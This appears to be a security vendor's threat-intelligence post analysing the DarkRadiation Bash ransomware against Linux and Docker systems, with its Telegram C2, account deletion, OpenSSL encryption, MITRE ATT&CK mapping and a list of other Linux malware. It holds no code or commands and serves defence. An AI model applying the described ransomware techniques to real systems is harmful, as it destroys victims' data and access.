.svg)
.svg)
The Blue Report 2024
Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.
Although most of the malware is developed for Windows environments, the number of malware developed for Linux-like operating systems such as macOS and Linux distributions is also high. One of these malware families, DarkRadiation, is a bash ransomware targeting Red Hat and Debian-based Linux distributions [1], and docker cloud containers [2].
The malware communicates with Telegram bots via hardcoded API keys using a sophisticated collection of Bash scripts and at least a half-dozen C2s. Wget, curl, sshpass, pssh, and openssl are among the DarkRadiation scripts' dependencies. If any of these are missing from the infected device, the ransomware uses YUM python-based package manager to obtain these essential tools.
The ransomware has the ability to erase all users on an infected system and create a separate account for the attacker. When it comes to file encryption, the ransomware uses OpenSSL's AES technique to encrypt either specific files or all files in a defined directory.
Picus Labs has updated the Picus Threat Library with new attack methods for malware samples used by the DarkRadiation ransomware.
|
Picus ID |
Threat Name |
|
671716 |
DarkRadiation Ransomware .SH File Download Variant-1 |
|
699113 |
DarkRadiation Ransomware .SH File Download Variant-2 |
MITRE ATT&CK Techniques used by DarkRadiation
Execution
- T1059.004 Command and Scripting Interpreter: Unix Shell
Privilege Escalation
- T1548 Abuse Elevation Control Mechanism
- T1543.002 Create or Modify System Process: Systemd Service
Defense Evasion
- T1027 Obfuscated Files or Information
- T1202 Indirect Command Execution
- T1014 Rootkit
- T1548 Abuse Elevation Control Mechanism
Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery (System Object Enumeration)
Persistence
- T1543.002 Create or Modify System Process: Systemd Service
Impact
- T1486 Data Encrypted for Impact
Other Linux Malware in Picus Threat Library
Picus Threat Library consists of 364 threats for Linux distributions, including Skidmap, TeamTNT, Rocke, Blackrota, Xanthe, Lucifer, FritzFrog, Kinsing, Bigviktor, Tor2Mine, Kingminer, Sandworm, Kaiji, Asnarok, LeetHozer, APT41, AESDDoS, Silex, Monero, HiddenWasp, Outlaw, Mirai, Korkerds, SpeakUp, Hakai, ChinaZ, Butter, SSHDoor, Miori, Torii, Gafgyt, Prowli, HNS, Wicked, OMG, JenX, VPNFilter, DDG, GoScanSSH, Owari, AES IoT Botnet, IOTroop, Hajime, PNScan, GoARM.Bot, KillFile, Mumblehard, Persirai, SHELLBIND, Hide N Seek, kworker, Ruby Cryptominer, XOR.DDoS, Moose, EternalMiner, Monero Miner, Erebus, Turla, Yangji, Tsunami, and Snakso.
References
[2] https://www.sentinelone.com/blog/darkradiation-abusing-bash-for-linux-and-docker-container-ransomware/
